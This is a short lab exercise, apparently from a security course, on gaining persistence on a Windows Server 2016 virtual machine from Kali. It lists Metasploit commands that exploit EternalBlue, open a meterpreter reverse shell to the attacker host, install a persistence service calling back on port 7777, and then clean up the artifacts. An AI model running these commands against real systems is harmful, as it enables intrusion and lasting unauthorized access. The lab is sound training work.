Activity 6.19.1
Persistence

VMs:
Kali
Server2016

Verify IP addresses of both VMs

-------------------------------------------------

Use Eternal Blue PSEXEC to compromise Server2016

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/reverse_tcp
set rhosts 192.168.6.136
set lhost 192.168.6.128
set smbpass 1Password
set smbuser moo
show options
run

background
sessions

use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set session <session ID>
set lport 7777
exploit

# Make note of the resource file

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <Kali IP>
set lport 7777
run

# Reboot Server2016
# Log in as administrator
# Verify that the handler receives a connection
# At the meterpreter prompt type:
getuid

# When done, at meterpreter prompt> enter:

resource <full path to resource file>

# Make note of the name of the remaining artifact in C:\Temp
# Manually delete the final artifact in C:\Temp





